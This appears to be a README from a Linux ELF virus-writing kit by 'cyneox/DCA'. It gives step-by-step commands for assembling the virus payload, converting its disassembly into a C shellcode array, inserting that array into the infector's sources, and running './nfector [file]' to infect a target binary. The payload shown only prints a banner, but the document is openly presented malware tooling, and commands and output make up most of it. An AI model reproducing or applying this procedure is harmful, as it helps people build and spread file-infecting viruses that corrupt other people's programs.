cyneox.asm contains the virus code. First you'll have to compile this source :

[code]
cyneox@dca:~>nasm -f elf -o cyneox.o cyneox.asm
[/code]

Then you'll have to link it :

[code]
cyneox@dca:~>ld -o cyneox cyneox.o
[/code]

Now we want to disassemble our executable...Therefore I'll use ndisasm.Then
I must transform those opcodes in C code.Therefore I'll use disasm.pl in
this directory(thanx Bartolich , who wrote ELFVirusWrittingHowto, for this
wonderfull tool).

First of all you find out the entry point of the binary:

[code]
cyneox@dca:~>readelf cyneox -h
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048080
  Start of program headers:          52 (bytes into file)
  Start of section headers:          280 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         1
  Size of section headers:           40 (bytes)
  Number of section headers:         8
  Section header string table index: 5

[/code]

You see that 0x8048080 is our entry point.Now you must subtract from the
entry point the ELF base to find out the offset to the beginning of our code.

0x8048080 - 0x8048000 = 0x80 (offset)

And now lets see the whole thing : 

[code]
cyneox@dca:~>ndisasm -e 0x80 -o 0x8048080 -U cyneox | sed 18q | disasm.pl
const unsigned char main[]
__attribute__ (( aligned(8), section(".text") )) =
{
  0x68,0x00,0x00,0x00,0x00,      /* 08048080: push dword 0x0         */
  0x9C,                          /* 08048085: pushf                  */
  0x60,                          /* 08048086: pusha                  */
  0x68,0x3A,0x0A,0x20,0x20,      /* 08048087: push dword 0x20200a3a  */
  0x68,0x6B,0x20,0x3A,0x3A,      /* 0804808C: push dword 0x3a3a206b  */
  0x68,0x6F,0x78,0x2E,0x74,      /* 08048091: push dword 0x742e786f  */
  0x68,0x63,0x79,0x6E,0x65,      /* 08048096: push dword 0x656e7963  */
  0x68,0x77,0x77,0x77,0x2E,      /* 0804809B: push dword 0x2e777777  */
  0x68,0x3A,0x3A,0x3A,0x20,      /* 080480A0: push dword 0x203a3a3a  */
  0xB8,0x04,0x00,0x00,0x00,      /* 080480A5: mov eax,0x4            */
  0xBB,0x01,0x00,0x00,0x00,      /* 080480AA: mov ebx,0x1            */
  0x89,0xE1,                     /* 080480AF: mov ecx,esp            */
  0xBA,0x18,0x00,0x00,0x00,      /* 080480B1: mov edx,0x18           */
  0x81,0xC4,0x18,0x00,0x00,0x00, /* 080480B6: add esp,0x18           */
  0xCD,0x80,                     /* 080480BC: int 0x80               */
  0x61,                          /* 080480BE: popa                   */
  0x9D,                          /* 080480BF: popf                   */
  0xC3                           /* 080480C0: ret                    */
}; /* 65 bytes (0x41) */

[code]

Then you must save this code into a file:

[code]
cyneox@dca:~>ndisasm -e 0x80 -o 0x8048080 -U cyneox | sed 18q | disasm.pl >
virus_code.c
[/code]

Then you'll have to change "const unsigned char main[]" to "const unsigned
char virus_code[]".Then copy this to the original virus_code.c file : 

[code]
cyneox@dca:~>cp virus_code.c ../virus_code.c
[/code]

Next step is too update virus size in ../write_infection.h 
Then execute ./make.sh and then ./nfector [file] 

Have fun! ; )


cyneox/DCA
http://www.cyneox.tk 
